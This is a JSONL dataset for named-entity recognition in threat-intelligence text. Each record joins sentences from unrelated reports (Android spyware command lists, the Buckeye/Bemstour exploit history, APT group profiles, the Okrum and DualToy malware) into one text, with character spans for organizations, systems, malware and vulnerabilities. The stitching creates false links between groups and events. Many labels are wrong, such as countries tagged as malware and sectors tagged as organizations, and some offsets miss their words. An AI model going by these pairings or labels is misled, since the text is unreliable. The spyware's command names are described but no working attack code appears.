{"text": "It controls each and every functionality based on the commands sent by the command and control ( C & C ) server . However , Buckeye had already been using some of these leaked tools at least a year beforehand . Gorgon Group is a threat group consisting of members who are suspected to be Pakistan based or have other connections to Pakistan .", "spans": [{"start": 124, "end": 131, "label": "Organization"}, {"start": 169, "end": 181, "label": "System"}, {"start": 211, "end": 223, "label": "Organization"}]}
{"text": "As soon as this service is started , it creates two processes that take care of connection and disconnection to the C & C server . The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong . The group has performed a mix of criminal and targeted attacks , including campaigns against government organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": [{"start": 157, "end": 177, "label": "System"}, {"start": 181, "end": 188, "label": "Organization"}]}
{"text": "This functionality can be seen in Figure 6 . Beginning in March 2016 , Buckeye began using a variant of DoublePulsar (Backdoor.Doublepulsar) , a backdoor that was subsequently released by the Shadow Brokers in 2017 . Sandworm Team : Quedagh , VOODOO BEAR .", "spans": [{"start": 71, "end": 78, "label": "Organization"}, {"start": 192, "end": 206, "label": "Organization"}, {"start": 217, "end": 230, "label": "Organization"}, {"start": 233, "end": 240, "label": "Organization"}, {"start": 243, "end": 254, "label": "Organization"}]}
{"text": "TimerTask Figure 6 : The timer task . However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware . Sandworm Team is a Russian cyber espionage group that has operated since approximately 2009 .", "spans": [{"start": 79, "end": 86, "label": "Organization"}, {"start": 118, "end": 139, "label": "System"}, {"start": 148, "end": 160, "label": "System"}, {"start": 276, "end": 289, "label": "Organization"}]}
{"text": "MainService has the following capabilities : Steal SMS messages Send SMS messages Steal the victim 's location Capture photos Execute commands Capture screenshots Call phone numbers Initiate other apps Steal Facebook credentials , etc All of the above functionalities take place on the basis of commands sent by the attacker . During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) . The group likely consists of Russian pro-hacktivists .", "spans": [{"start": 208, "end": 216, "label": "System"}, {"start": 409, "end": 424, "label": "System"}]}
{"text": "Stolen data is stored in external storage under the /DCIM/ directory with a hidden sub-directory named \" .dat '' . One hour later , Bemstour was used against an educational institution in Belgium . Sandworm Team targets mainly Ukrainian entities associated with energy , industrial control systems , SCADA , government , and media .", "spans": [{"start": 132, "end": 140, "label": "Malware"}, {"start": 188, "end": 195, "label": "Malware"}, {"start": 198, "end": 211, "label": "Organization"}]}
{"text": "Below is the list of all the commands catered by the C & C server . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . Sandworm Team has been linked to the Ukrainian energy sector attack in late 2015 .", "spans": [{"start": 68, "end": 76, "label": "Malware"}, {"start": 105, "end": 112, "label": "Malware"}, {"start": 130, "end": 151, "label": "System"}, {"start": 154, "end": 167, "label": "Organization"}]}
{"text": "Command Action Unistxcr Restart the app dowsizetr Send the file stored in the /sdcard/DCIM/.dat/ directory to the C & C server Caspylistx Get a list of all hidden files in the /DCIM/.dat/ directory spxcheck Check whether call details are collected by the spyware S8p8y0 Delete call details stored by the spyware screXmex Take screenshots of the device screen Batrxiops Check battery status L4oclOCMAWS Fetch the victim 's location GUIFXB Launch DoublePulsar is then used to inject a secondary payload , which runs in memory only . Scarlet Mimic is a threat group that has targeted minority rights activists .", "spans": [{"start": 445, "end": 457, "label": "Malware"}, {"start": 474, "end": 480, "label": "Malware"}, {"start": 531, "end": 544, "label": "Organization"}]}
{"text": "the fake Facebook login page IODBSSUEEZ Send a file containing stolen Facebook credentials to the C & C server FdelSRRT Delete files containing stolen Facebook credentials chkstzeaw Launch Facebook LUNAPXER Launch apps according to the package name sent by the C & C server Gapxplister Get a list of all installed applications DOTRall8xxe Zip all the stolen files and store in the /DCIM/.dat/ directory Acouxacour Get a list of accounts on the victim 's device Fimxmiisx Open the camera A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . This group has not been directly linked to a government source , but the group 's motivations appear to overlap with those of the Chinese government .", "spans": [{"start": 9, "end": 17, "label": "System"}, {"start": 70, "end": 78, "label": "System"}, {"start": 151, "end": 159, "label": "System"}, {"start": 189, "end": 197, "label": "System"}, {"start": 527, "end": 535, "label": "Malware"}, {"start": 794, "end": 812, "label": "Organization"}]}
{"text": "Scxreexcv4 Capture an image micmokmi8x Capture audio Yufsssp Get latitude and longitude GExCaalsss7 Get call logs PHOCAs7 Call phone numbers sent by the C & C server Gxextsxms Get a list of inbox SMS messages Msppossag Send SMS with message body sent by the C & C server Getconstactx Get a list of all contacts Rinxgosa Play a ringtone bithsssp64 Execute commands sent by the C & C server DOWdeletx Deletes When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor . While there is some overlap between IP addresses used by Scarlet Mimic E-APT and Putter Panda , it has not been concluded that the groups are the same .", "spans": [{"start": 442, "end": 450, "label": "System"}, {"start": 476, "end": 497, "label": "System"}, {"start": 554, "end": 564, "label": "Organization"}, {"start": 565, "end": 593, "label": "Organization"}]}
{"text": "the file specified by the C & C server Deldatall8 Delete all files stored in the /sdcard/DCIM/.dat/ directory We do n't have the space to cover all of the commands , but let 's take a look at some of the major ones . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . Silence is a financially motivated threat actor targeting financial institutions in different countries .", "spans": [{"start": 217, "end": 225, "label": "Malware"}, {"start": 307, "end": 314, "label": "Organization"}]}
{"text": "Facebook phishing One of the interesting features of this spyware is the ability to steal Facebook credentials using a fake login page , similar to phishing . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . The group was first seen in June 2016 .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 90, "end": 98, "label": "System"}, {"start": 193, "end": 201, "label": "Malware"}]}
{"text": "Upon receiving the command GUIFXB , the spyware launches a fake Facebook login page . Development of Bemstour has continued into 2019 . Their main targets reside in Russia , Ukraine , Belarus , Azerbaijan , Poland and Kazakhstan .", "spans": [{"start": 64, "end": 72, "label": "System"}, {"start": 101, "end": 109, "label": "Malware"}]}
{"text": "As soon as the victim tries to log in , it stores the victim 's credentials in /storage/0/DCIM/.fdat Facebook Login Figure 7 : Fake Facebook login The second command is IODBSSUEEZ , which further sends stolen credentials to the C & C server , as seen in Figure 8 . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . They compromised various banking systems , including the Russian Central Bank 's Automated Workstation Client , ATMs , and card processing .", "spans": [{"start": 101, "end": 109, "label": "System"}, {"start": 132, "end": 140, "label": "System"}, {"start": 293, "end": 301, "label": "Malware"}, {"start": 332, "end": 337, "label": "Malware"}, {"start": 338, "end": 346, "label": "Malware"}, {"start": 406, "end": 415, "label": "System"}, {"start": 416, "end": 424, "label": "System"}]}
{"text": "Stolen Data Figure 8 : Sending data to the attacker . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Threat Group-1314 : TG-1314 .", "spans": [{"start": 80, "end": 88, "label": "Malware"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 229, "end": 246, "label": "Organization"}, {"start": 249, "end": 256, "label": "Organization"}]}
{"text": "This functionality can be easily further extended to steal other information , such as bank credentials , although we did not see any banks being targeted in this attack . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . Threat Group-1314 is an unattributed threat group that has used", "spans": [{"start": 172, "end": 181, "label": "Malware"}, {"start": 266, "end": 283, "label": "Organization"}]}
{"text": "Calling functionality Command PHOCAs7 initiates calling functionality . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . compromised credentials to log into a victim \u2019s remote access infrastructure .", "spans": [{"start": 121, "end": 129, "label": "Organization"}, {"start": 130, "end": 145, "label": "Vulnerability"}]}
{"text": "The number to call is received along with the command , as seen in Figure 9 . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . Threat Group-3390 : TG-3390 ,Emissary Panda , BRONZE UNION , APT27 , Iron Tiger , LuckyMouse .", "spans": [{"start": 84, "end": 92, "label": "Organization"}, {"start": 123, "end": 132, "label": "Malware"}, {"start": 284, "end": 299, "label": "Malware"}, {"start": 300, "end": 316, "label": "System"}, {"start": 319, "end": 336, "label": "Organization"}, {"start": 339, "end": 346, "label": "Organization"}, {"start": 347, "end": 362, "label": "Organization"}, {"start": 365, "end": 377, "label": "Organization"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 388, "end": 398, "label": "Organization"}, {"start": 401, "end": 411, "label": "Organization"}]}
{"text": "Call Command Figure 9 : The calling functionality . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . Threat Group-3390 is a Chinese threat group that extensively used strategic Web compromises to target victims .", "spans": [{"start": 52, "end": 65, "label": "Vulnerability"}, {"start": 101, "end": 121, "label": "Malware"}, {"start": 126, "end": 145, "label": "Malware"}, {"start": 211, "end": 228, "label": "Organization"}]}
{"text": "The phone number is fetched from a response from the C & C server and is stored in str3 variable , which further is utilized using the tel : function . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . The group has been active since at least 2010 and has targeted organizations in the aerospace , government , defense , technology energy , and manufacturing sectors .", "spans": [{"start": 177, "end": 191, "label": "Malware"}, {"start": 205, "end": 219, "label": "Malware"}, {"start": 238, "end": 251, "label": "Malware"}, {"start": 434, "end": 443, "label": "Organization"}, {"start": 446, "end": 456, "label": "Organization"}, {"start": 459, "end": 466, "label": "Organization"}, {"start": 469, "end": 479, "label": "Organization"}, {"start": 480, "end": 486, "label": "Organization"}, {"start": 493, "end": 514, "label": "Organization"}]}
{"text": "Stealing SMS The Gxextsxms command is responsible for fetching all the SMS messages from the victim 's device and sending it over to the C & C server . In the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) . Thrip is an espionage group that has targeted satellite communications ,telecoms ,and defense contractor companies in the U.S. and Southeast Asia .", "spans": [{"start": 171, "end": 191, "label": "System"}, {"start": 269, "end": 274, "label": "Organization"}]}
{"text": "Stealing SMS Figure 10 : Stealing SMS messages . It is noteworthy that the attackers never used the FuzzBunch framework in its attacks . The group uses custom malware as well as \u201c living off the land \u201d techniques .", "spans": [{"start": 75, "end": 84, "label": "Organization"}, {"start": 100, "end": 119, "label": "System"}]}
{"text": "Similarly , there are many crucial commands that further allow this spyware to perform additional functionality , such as executing commands sent by the C & C , clicking photos , capturing screenshots , stealing location information , and more . FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 . NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": [{"start": 246, "end": 255, "label": "System"}, {"start": 356, "end": 370, "label": "Organization"}, {"start": 381, "end": 390, "label": "Organization"}]}
{"text": "Further analysis Upon further research , we found this spyware to be developed by a framework similar to Spynote and Spymax , meaning this could be an updated version of these Trojan builders , which allow anyone , even with limited knowledge , to develop full-fledged spyware . There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak . The group has demonstrated similarity to another activity group called PROMETHIUM due to overlapping victim and campaign characteristics .", "spans": [{"start": 105, "end": 112, "label": "Malware"}, {"start": 117, "end": 123, "label": "Malware"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 339, "end": 353, "label": "Organization"}, {"start": 464, "end": 474, "label": "Organization"}]}
{"text": "Many of the functionalities seen in this spyware are similar to Spynote and Spymax based on the samples we analyzed with some modifications . However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled . NEODYMIUM is reportedly associated closely with BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": [{"start": 64, "end": 71, "label": "Malware"}, {"start": 76, "end": 82, "label": "Malware"}, {"start": 196, "end": 204, "label": "Organization"}, {"start": 244, "end": 251, "label": "Organization"}, {"start": 267, "end": 276, "label": "Organization"}, {"start": 315, "end": 325, "label": "Organization"}]}
{"text": "This spyware sample communicates over dynamic DNS . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . Night Dragon is a campaign name for activity involving a threat group that has conducted activity originating primarily in China .", "spans": [{"start": 57, "end": 60, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 97, "end": 109, "label": "Malware"}, {"start": 112, "end": 124, "label": "Organization"}]}
{"text": "By doing so , attackers can easily set up the Trojan to communicate back to them without any need for high-end servers . And the dropper execute the iassvcs.exe to make a side loading and make the persistence . OilRig : IRN2 , HELIX KITTEN , APT34 .", "spans": [{"start": 129, "end": 136, "label": "Malware"}, {"start": 149, "end": 160, "label": "Malware"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 220, "end": 224, "label": "Organization"}, {"start": 227, "end": 239, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}]}
{"text": "Other common functionalities include executing commands received from the attacker , taking screenshots of the victim 's device , fetching locations , stealing SMS messages and most common features that every spyware may poses . This IP is very interesting because it connects with tele.zyns.com and old infrastructures used by chinese APT or DDOS Chinese team against the ancient soviet republics . OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014 .", "spans": [{"start": 328, "end": 339, "label": "Organization"}, {"start": 373, "end": 397, "label": "Organization"}, {"start": 400, "end": 406, "label": "Organization"}]}
{"text": "Stealing Facebook credentials using fake Facebook activity is something we did n't observe in Spynote/Spymax versions but was seen in this spyware . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . The group has targeted a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East .", "spans": [{"start": 9, "end": 17, "label": "Organization"}, {"start": 41, "end": 49, "label": "Organization"}, {"start": 94, "end": 108, "label": "Malware"}, {"start": 177, "end": 186, "label": "Malware"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 354, "end": 364, "label": "Organization"}, {"start": 367, "end": 373, "label": "Organization"}, {"start": 376, "end": 384, "label": "Organization"}, {"start": 391, "end": 409, "label": "Organization"}]}
{"text": "This framework allows anyone to develop a malicious app with the desired icon and communication address . All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash . It appears the group carries out supply chain attacks , leveraging the trust relationship between organizations to attack their primary targets .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 210, "end": 227, "label": "System"}, {"start": 232, "end": 237, "label": "System"}]}
{"text": "Some of the icons used can be seen below . According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs . FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": [{"start": 126, "end": 138, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 243, "end": 261, "label": "Organization"}]}
{"text": "We found 280 such apps in the past three months . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . This group was previously tracked under two distinct groups , APT34 and OilRig , but was combined due to additional reporting giving higher confidence about the overlap of the activity .", "spans": [{"start": 104, "end": 113, "label": "Malware"}, {"start": 316, "end": 321, "label": "Organization"}, {"start": 326, "end": 332, "label": "Organization"}]}
{"text": "A complete list of hashes can be found here . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . APT16 is a China based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations .", "spans": [{"start": 46, "end": 58, "label": "Malware"}, {"start": 115, "end": 125, "label": "Malware"}, {"start": 128, "end": 133, "label": "Organization"}]}
{"text": "icons Figure 11 : Icons used to pose as famous apps . In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . APT17 : Deputy Dog .", "spans": [{"start": 110, "end": 119, "label": "Organization"}, {"start": 215, "end": 222, "label": "Organization"}, {"start": 300, "end": 305, "label": "Organization"}, {"start": 308, "end": 318, "label": "Organization"}]}
{"text": "All of these apps are developed by the same framework and hence have the same package name and certificate information as seen in Figure 12. certificate Figure 12 : Package name and certificate information . However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking . APT17 is a China based threat group that has conducted network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": [{"start": 226, "end": 232, "label": "Organization"}, {"start": 288, "end": 291, "label": "System"}, {"start": 292, "end": 301, "label": "System"}, {"start": 304, "end": 309, "label": "Organization"}, {"start": 436, "end": 445, "label": "Organization"}, {"start": 448, "end": 480, "label": "Organization"}, {"start": 483, "end": 499, "label": "Organization"}]}
{"text": "Conclusion Due to the ubiquitous nature of mobile devices and the widespread use of Android , it is very easy for attackers to victimize Android users . Today , this malware is still actively being used against the Philippines . APT18 : TG-0416 , Dynamite Panda , Threat Group-0416 .", "spans": [{"start": 84, "end": 91, "label": "System"}, {"start": 137, "end": 144, "label": "System"}, {"start": 166, "end": 173, "label": "Malware"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 237, "end": 244, "label": "Organization"}, {"start": 247, "end": 261, "label": "Organization"}, {"start": 264, "end": 281, "label": "Organization"}]}
{"text": "In such situations , mobile users should always take the utmost precautions while downloading any applications from the internet . Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 . APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries , including , manufacturing , human rights , government , and .", "spans": [{"start": 164, "end": 167, "label": "Organization"}, {"start": 227, "end": 232, "label": "Organization"}]}
{"text": "It is very easy to trick victims to fall for such attacks . Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware . Group5 is a threat group with a suspected Iranian nexus , though this attribution is not definite .", "spans": [{"start": 93, "end": 97, "label": "Organization"}, {"start": 173, "end": 184, "label": "System"}, {"start": 189, "end": 204, "label": "System"}, {"start": 207, "end": 213, "label": "Organization"}]}
{"text": "Users looking forward to using the TikTok app amidst the ban might look for alternative methods to download the app . Xagent is the original filename Xagent.exe whereas seems to be the version of the worm . The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes , normally using Syrian and Iranian themes .", "spans": [{"start": 35, "end": 41, "label": "System"}, {"start": 118, "end": 124, "label": "Malware"}, {"start": 150, "end": 160, "label": "Malware"}, {"start": 200, "end": 204, "label": "Malware"}]}
{"text": "In doing so , users can mistakenly install malicious apps , such as the spyware mentioned in this blog . Xagent \u2013 A variant of JbossMiner Mining Worm\u201d \u2013 a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms . Group5 has used two commonly available remote access tools ( RATs ) , njRAT S-MAL and NanoCore , as well as an Android RAT , DroidJack .", "spans": [{"start": 105, "end": 111, "label": "Organization"}, {"start": 127, "end": 144, "label": "Organization"}, {"start": 248, "end": 254, "label": "Organization"}, {"start": 287, "end": 306, "label": "Malware"}, {"start": 309, "end": 313, "label": "Malware"}, {"start": 316, "end": 342, "label": "Malware"}, {"start": 359, "end": 370, "label": "Malware"}, {"start": 373, "end": 382, "label": "Malware"}]}
{"text": "The precautions you take online have been covered extensively in almost all of our blogs ; even so , we believe this information bears repeating . Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang \u2013 a cyberespionage campaign directed at diplomatic organizations in Europe . Honeybee is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": [{"start": 190, "end": 199, "label": "Organization"}, {"start": 225, "end": 233, "label": "Organization"}]}
{"text": "Please follow these basic precautions during the current crisis\u2014and at all times : Install apps only from official stores , such as Google Play . We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group \u2013 a backdoor we named Okrum . It has been an active operation since August of 2017 and as recently as February 2018 .", "spans": [{"start": 132, "end": 143, "label": "System"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 322, "end": 330, "label": "System"}, {"start": 340, "end": 345, "label": "System"}]}
{"text": "Never click on unknown links received through ads , SMS messages , emails , or the like . Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group \u2013 BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 . Group7 : APT15 , Mirage , Vixen Panda , GREF , Playful Dragon , RoyalAPT .", "spans": [{"start": 193, "end": 201, "label": "Organization"}, {"start": 210, "end": 226, "label": "System"}, {"start": 259, "end": 275, "label": "System"}, {"start": 290, "end": 293, "label": "Organization"}, {"start": 310, "end": 316, "label": "Organization"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 327, "end": 333, "label": "Organization"}, {"start": 336, "end": 347, "label": "Organization"}, {"start": 350, "end": 354, "label": "Organization"}, {"start": 357, "end": 371, "label": "Organization"}, {"start": 374, "end": 382, "label": "Organization"}]}
{"text": "Always keep the \" Unknown Sources '' option disabled in the Android device . Ke3chang behind the attacks seemed to have a particular interest in Slovakia , where a big portion of the discovered malware samples was detected; Croatia , the Czech Republic and other countries were also affected . Ke3chang is a threat group attributed to actors operating out of China .", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 77, "end": 85, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}]}
{"text": "This disallows apps to be installed on your device from unknown sources . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . Ke3chang has targeted several industries , including oil , government , military , and more .", "spans": [{"start": 104, "end": 111, "label": "Malware"}, {"start": 155, "end": 171, "label": "Malware"}, {"start": 215, "end": 231, "label": "Malware"}, {"start": 253, "end": 262, "label": "Organization"}, {"start": 330, "end": 338, "label": "Organization"}]}
{"text": "We would also like to mention that if you come across an app hiding it 's icon , always try to search for the app in your device settings ( by going to Settings - > Apps - > Search for icon that was hidden ) . The story continued in late 2016 , when we discovered a new , previously unknown backdoor that we named Okrum . Kimsuky : Velvet Chollima .", "spans": [{"start": 291, "end": 299, "label": "System"}, {"start": 314, "end": 319, "label": "System"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 332, "end": 347, "label": "Organization"}]}
{"text": "In the case of this spyware , search for app named TikTok Pro . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . Kimsuky is a North Korean based threat group that has been active since at least September 2013 .", "spans": [{"start": 51, "end": 61, "label": "System"}, {"start": 96, "end": 109, "label": "Malware"}, {"start": 202, "end": 211, "label": "Malware"}, {"start": 214, "end": 221, "label": "Organization"}]}
{"text": "MITRE TAGS Action Tag ID App auto-start at device boot T1402 Input prompt T1411 Capture SMS messages T1412 Application discovery T1418 Capture audio T1429 Location tracking T1430 Access contact list T1432 Access call log T1433 Commonly used port T1436 Standard application layer protocol T1437 Masquerage as legitimate application T1444 Suppress application icon T1508 Capture camera T1512 Screen capture T1513 Foreground persistence T1541 DualToy : New Windows Trojan Sideloads Risky Apps to Android and iOS Devices We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . The group focuses on targeting Korean think tank as well as DPRK/nuclear-related targets .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 440, "end": 447, "label": "Malware"}, {"start": 454, "end": 461, "label": "System"}, {"start": 493, "end": 500, "label": "System"}, {"start": 505, "end": 508, "label": "System"}, {"start": 576, "end": 590, "label": "Malware"}, {"start": 610, "end": 627, "label": "Malware"}, {"start": 688, "end": 705, "label": "Organization"}, {"start": 717, "end": 737, "label": "Organization"}]}
{"text": "By Claud Xiao September 13 , 2016 at 5:00 AM Over the past two years , we \u2019 ve observed many cases of Microsoft Windows and Apple iOS malware designed to attack mobile devices . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . The group was attributed as the actor behind the Korea Hydro & Nuclear Power Co.compromise .", "spans": [{"start": 102, "end": 119, "label": "System"}, {"start": 124, "end": 133, "label": "System"}, {"start": 232, "end": 245, "label": "Malware"}, {"start": 262, "end": 280, "label": "Malware"}, {"start": 377, "end": 418, "label": "Organization"}]}
{"text": "This attack vector is increasingly popular with malicious actors as almost everyone on the planet carries at least one mobile device they interact with throughout any given day . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . Lazarus Group : HIDDEN COBRA , Guardians of Peace , ZINC , NICKEL ACADEMY .", "spans": [{"start": 230, "end": 246, "label": "Malware"}, {"start": 253, "end": 261, "label": "Malware"}, {"start": 278, "end": 291, "label": "Organization"}, {"start": 294, "end": 306, "label": "Organization"}, {"start": 309, "end": 327, "label": "Organization"}, {"start": 330, "end": 334, "label": "Organization"}, {"start": 337, "end": 351, "label": "Organization"}]}
{"text": "Thanks to a relative lack of security controls applied to mobile devices , these devices have become very attractive targets for a broad range of malicious actors . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . Lazarus Group is a threat group that has been attributed to the North Korean government .", "spans": [{"start": 178, "end": 182, "label": "Organization"}, {"start": 195, "end": 200, "label": "Malware"}, {"start": 343, "end": 356, "label": "Organization"}, {"start": 407, "end": 430, "label": "Organization"}]}
{"text": "For example : WireLurker installed malicious apps on non-jailbroken iPhones Six different Trojan , Adware and HackTool families launched \u201c BackStab \u201d attacks to steal backup archives of iOS and BlackBerry devices The HackingTeam \u2019 s RCS delivered its Spyware from infected PCs and Macs to jailbroken iOS devices and BlackBerry phones Recently , we discovered another Windows Trojan we named \u201c DualToy \u201d which side loads malicious or risky apps to both Android and iOS devices via a USB connection . In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta .", "spans": [{"start": 14, "end": 24, "label": "Malware"}, {"start": 110, "end": 127, "label": "Malware"}, {"start": 186, "end": 189, "label": "System"}, {"start": 194, "end": 204, "label": "System"}, {"start": 217, "end": 228, "label": "Malware"}, {"start": 233, "end": 236, "label": "Malware"}, {"start": 300, "end": 303, "label": "System"}, {"start": 316, "end": 326, "label": "System"}, {"start": 367, "end": 374, "label": "System"}, {"start": 393, "end": 400, "label": "Malware"}, {"start": 452, "end": 459, "label": "System"}, {"start": 464, "end": 467, "label": "System"}, {"start": 482, "end": 485, "label": "System"}, {"start": 555, "end": 564, "label": "Organization"}, {"start": 589, "end": 596, "label": "Organization"}, {"start": 806, "end": 833, "label": "Organization"}, {"start": 887, "end": 894, "label": "Organization"}]}
{"text": "When DualToy began to spread in January 2015 , it was only capable of infecting Android devices . In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements . Malware used by Lazarus Group correlates to other reported campaigns , including Operation Flame , Operation 1Mission , Operation Troy , DarkSeoul , and Ten Days of Rain .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 80, "end": 87, "label": "System"}, {"start": 108, "end": 110, "label": "Organization"}, {"start": 216, "end": 229, "label": "Organization"}, {"start": 281, "end": 296, "label": "Malware"}, {"start": 299, "end": 317, "label": "Malware"}, {"start": 320, "end": 334, "label": "Malware"}, {"start": 337, "end": 346, "label": "Malware"}, {"start": 353, "end": 369, "label": "Malware"}]}
{"text": "However , within six months the malicious actors added the capability to infect iOS devices . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . In late 2017 , Lazarus Group used KillDisk , a disk-wiping tool , in an attack against an online casino based in Central America .", "spans": [{"start": 80, "end": 83, "label": "System"}, {"start": 123, "end": 128, "label": "Malware"}, {"start": 303, "end": 316, "label": "Organization"}, {"start": 322, "end": 330, "label": "Malware"}]}
{"text": "DualToy is still active and we have detected over 8,000 unique samples belonging to this Trojan family to date . Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions . North Korean group definitions are known to have significant overlap , and the name Lazarus Group is known to encompass a broad range of activity .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 196, "end": 205, "label": "System"}, {"start": 208, "end": 213, "label": "System"}, {"start": 241, "end": 269, "label": "System"}, {"start": 356, "end": 369, "label": "Organization"}]}
{"text": "It mainly targets Chinese users , but has also successfully affected people and organizations in the United States , United Kingdom , Thailand , Spain , and Ireland . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea .", "spans": [{"start": 219, "end": 224, "label": "Malware"}, {"start": 241, "end": 250, "label": "Malware"}, {"start": 451, "end": 464, "label": "Organization"}]}
{"text": "Credential phishing and an Android banking Trojan combine in Austrian mobile attacks NOVEMBER 03 , 2017 Overview Credential phishing , banking Trojans , and credit card phishing schemes are common threats that we regularly observe both at scale and in more targeted attacks . The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation . Some organizations track North Korean clusters or groups such as Bluenoroff , APT37 , and APT38 separately , while other organizations may track some activity associated with those group names by the name Lazarus Group .", "spans": [{"start": 27, "end": 34, "label": "System"}, {"start": 461, "end": 469, "label": "Organization"}, {"start": 589, "end": 599, "label": "Organization"}, {"start": 602, "end": 607, "label": "Organization"}, {"start": 614, "end": 619, "label": "Organization"}, {"start": 729, "end": 742, "label": "Organization"}]}
